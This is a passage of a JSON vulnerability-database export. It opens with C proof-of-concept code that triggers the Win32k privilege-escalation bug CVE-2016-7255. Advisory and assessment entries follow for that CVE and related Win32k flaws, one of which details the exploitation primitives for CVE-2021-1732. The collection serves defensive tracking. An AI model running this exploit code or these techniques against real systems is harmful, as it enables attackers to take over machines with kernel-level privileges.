comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n\n#undef DbgPrint\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList=NULL;\n\tULONG ulRet = 0;\n\t\n\tdo \n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\n\t\t\n\t\tva_start(VaList,Format);\n\t\t\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\n\t\t\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\n\t\tOutputDebugStringA(pszDbgBuff);\n\t\t\n\t\tva_end(VaList);\n\t\t\n\t} while (FALSE);\n\t\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\n\t\tpszDbgBuff = NULL;\n\t}\n\t\n\treturn ulRet;\n}\n\n\n int _sim_key_down(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = 0;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_key_up(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_alt_shift_esc()\n {\n\t int i = 0;\n\t \n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\t\t \n\t\t\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\t\t\t \n\t\t _sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \t \n\t\t \n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n \n\n int _sim_alt_shift_tab(int nCount)\n {\n\t int i = 0;\n\t HWND hWnd = NULL;\n\n\n\t int nFinalRet = -1;\n\n\t do \n\t {\n\t\t 
_sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\n\n\t\t for ( i = 0; i < nCount ; i++)\n\t\t {\n\t\t\t _sim_key_down( VK_TAB);\n\t\t\t _sim_key_up( VK_TAB);\n\t\t\t \n\t\t\t Sleep(1000);\n\n\t\t }\n\t\n\t\t \n\t\t_sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \n\t } while (FALSE);\n\t \n\t return nFinalRet;\n}\n\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = {0};\n\n\tHWND\thWndParent = NULL;\n\tHWND\thWndChild = NULL;\n\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\n\n\tvoid*\tpId = NULL;\n\tMSG\t\tstMsg = {0};\n\n\tdo \n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\t\t\n\t\tif ( 0 == RegisterClassExW(&stWC) )\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\t\t\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\t#ifdef _WIN64\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \n\t\t#else\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \n\t\t#endif // #ifdef _WIN64\n\t\t\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\n\t\tDebugBreak();\n\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild , GetDesktopWindow() );\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\t\t\n\t\tSwitchToThisWindow(hWndChild , TRUE);\n\t\t\n\t\t_sim_alt_shift_esc();\n\n\n\t\twhile( 
GetMessage(&stMsg , NULL , 0 , 0) )\n\t\t{\t\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t}\n\t\n\n\t} while (FALSE);\n\n\tif ( NULL != hWndParent )\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif ( NULL != hWndChild )\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\n\n\treturn 0;\n}\n\nint __cdecl wmain(int nArgc, WCHAR** Argv)\n{\n\tdo \n\t{\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\n\t} while (FALSE);\n\t\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-11-03T16:41:49", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2016-7255", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 
7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2021-07-27T00:00:00", "id": "AKB:72C050B4-DAF1-455C-A49A-FECD7DBEBFF3", "href": "https://attackerkb.com/topics/WhUsVvgJrc/cve-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T18:12:10", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 10, 2021 10:03pm UTC reported:\n\nA very interesting vulnerability in win32kfull.sys on Windows 10 devices up to and including 20H2. Although the exploit in the wild specifically targeted Windows 10 v1709 to Windows 10 v1909, as noted at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>, the researchers noted that the vulnerability could be modified to work on Windows 20H2 with minor modifications.\n\nFrom my perspective this is rather significant, particularly given this is a win32kfull.sys bug we are talking about here. Most of the primitives that made win32k exploitation easier were entirely wiped out by Microsoft which prompted a lot of researchers who previously spoke publicly about such primitives in conference talks and similar to go quiet. Whilst rumor has been that there were other primitives one could use for exploitation, they were considered closely guarded secrets due to the difficulty in finding them and the fact that Microsoft would be likely to patch them very quickly.\n\nThe new primitive that is used here appears to be setting tagMenuBarInfo.rcBar.left and tagMenuBarInfo.rcBar.top and then calling GetMenuBarInfo(), which allows one to perform an arbitrary read in kernel memory. 
This has not been discussed before but is similar to another concepted discussed in the paper \u201cLPE vulnerabilities exploitation on Windows 10 Anniversary Update\u201d at ZeroNights which mentioned using two adjacent Windows and then setting the cbwndExtra field of the first window to a large value to allow the first window to set all of the properties of the second window. By chaining this together the attacker could achieve an arbitrary read and write in kernel memory.\n\nThe bug itself stems from a xxxClientAllocWindowClassExtraBytes() callback within win32kfull!xxxCreateWindowEx. Specifically when xxxCreateWindowEx() creates a window object with a cbwndExtra field set, aka it has extra Window bytes, it will perform a xxxClientAllocWindowClassExtraBytes() callback to usermode to allocate the extra bytes for the Window.\n\nYou may be wondering why such callbacks are needed. Well a long time ago Windows used to handle all its graphics stuff in kernel mode, but then people realized that was too slow given increasing demands for speed, so they made most of the code operate in usermode with key stuff handled by kernel mode. This lead to a big rift and is the reason we have callbacks. Thats the nutshell version anyway but go read up on <http://mista.nu/research/mandt-win32k-slides.pdf> and <https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf> if you want to learn more. Its a fascinating read :)\n\nAnyway back on topic. Since xxxClientAllocWindowClassExtraBytes() is a callback that is under the attackers controller, the attacker can set a hook that will trigger when a xxxClientAllocWindowClassExtraBytes() callback is made and call NtUserConsoleControl() with the handle of the window that is currently being operated on. 
This will end up calling xxxConsoleControl() in kernel mode which will set *((tagWND+0x28)+0x128) to an offset, and will AND the flag at *((tagWND+0x28) + 0xE8) with 0x800 to indicate that the value of the WndExtra member is an offset from the base address of RtlHeapBase. Unfortunately, whatever value is returned by the hooked xxxClientAllocWindowClassExtraBytes() callback (aka whatever value the attacker chooses) will be used as the value of WndExtra, since remember we are meant to be allocating the address of this field at the time due to the earlier xxxCreateWindowEx() call needing to allocate memory for WndExtra.\n\nOnce this is done, the callback will be completed, execution will return to usermode, and a call to DestroyWindow() will be made from usermode. This will cause xxxDestroyWindow() to be called in kernel mode which will call xxxFreeWindow(), which will check if *((tagWND+0x28) + 0xE8) has the flag designated by 0x800 set, which it will due to the alterations made by xxxConsoleControl(). This will then result in a call to RtlFreeHeap() which will attempt to free an address designated by RtlHeapBase + offset, where offset is the value of WndExtra (which is taken from the xxxClientAllocWindowClassExtraBytes() callback and therefore completely controlled by the attacker).\n\nThis subsequently results in the attacker being able to free memory at an arbitrary address in memory.\n\nI\u2019ll not dive into a full detailed analysis of the rest of the exploitation steps as the article at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/> is very comprehensive but I will say from what I\u2019ve read there, there is enough detail that people of a decent skill level could probably recreate this exploit. 
It certainly isn\u2019t an easy exploit to recreate but the exploit goes into a lot of detail about the various mitigation bypasses that were used to make this exploit possible, which could help an attacker more readily recreate this bug.\n\nAgain, this exploit was exploited in the wild so it is possible for this bug to be recreated, it just might take some time for people to work out a few of the specifics needed to get a working exploit. If you are running Windows 10, it is highly advised to upgrade as soon as possible: everything I am reading here points to signs that this will be weaponized within the coming few weeks or months.\n\nAdditionally it should be noted that this exploit was noted to be capable of escaping Microsoft IE\u2019s sandbox (but not Google Chrome\u2019s) so if you are running Microsoft IE within your environment, its even more imperative that you patch this issue to prevent an attacker from combining this with an IE 0day and conducting a drive by attack against your organization, whereby simply browsing a website could lead to attackers gaining SYSTEM level privileges against affected systems.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-1732", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-04T00:00:00", "id": "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "href": "https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:10:05", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 13, 2021 8:41pm UTC reported:\n\nAh, another day, another Win32k privilege escalation used in the wild. [Securelist has a good write-up](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) on this bug, which they discovered because it was used in a BITTER APT zero-day attack in (it sounds like) conjunction with [CVE-2021-1732](<https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e>) (there\u2019s a Metasploit module for the second vuln).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-17T00:00:00", "id": "AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "href": "https://attackerkb.com/topics/pKKVzHnVRA/cve-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T20:31:16", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 18, 2022 4:35pm UTC reported:\n\nLooks like this is a LPE in win32k that is being exploited in the wild according to Microsoft to let attackers escalate their privileges to SYSTEM. Attack complexity on this is high which is understandable given the history of win32k and the complexities regarding its architecture which was built before modern security mitigations were implemented. With that being said though the finder of this bug, at <https://twitter.com/b2ahex/status/1481233350840893442>, notes that exploitation is easy and that this is a patch bypass for CVE-2021-1732, which was a window object type confusion leading to an OOB (out-of-bounds) write as noted by McAfee\u2019s technical writeup at <https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/technical-analysis-of-cve-2021-1732/>.\n\nOf particular note here is that they credit Big CJTeam of Tianfu Cup and RyeLv aka @b2ahex on Twitter for finding this vulnerability. 
They note that this was exploited in the wild but the mention of Tianfu Cup is interesting as it suggests this was also reported to China\u2019s government via the Chinese Tianfu Cup hacking competition.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21882", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-02-08T00:00:00", "id": "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "href": "https://attackerkb.com/topics/KBiVbKrlyU/cve-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:05:19", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. 
A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2016-11-08T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-08T00:00:00", "id": "SMNTC-94064", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94064", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:14", "description": "An elevation of privilege vulnerability exists in Microsoft Windows Win32k. A remote attacker can bypass a security check in win32k when Microsoft Windows improperly deals with one of its kernel components. A successful exploitation could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Win32k Elevation of Privilege (MS16-135: CVE-2016-7255)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2019-12-17T00:00:00", "id": "CPAI-2016-0979", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:34:15", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-1732)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CPAI-2021-0032", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2021-12-06T18:25:24", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-08T08:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7255", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:07", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1732. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-02-09T08:00:00", "id": "MS:CVE-2021-1698", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1698", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:50:08", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-04-06T07:00:00", "id": "MS:CVE-2021-1732", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "description": "Cyber espionage actors, now designated by FireEye as APT32 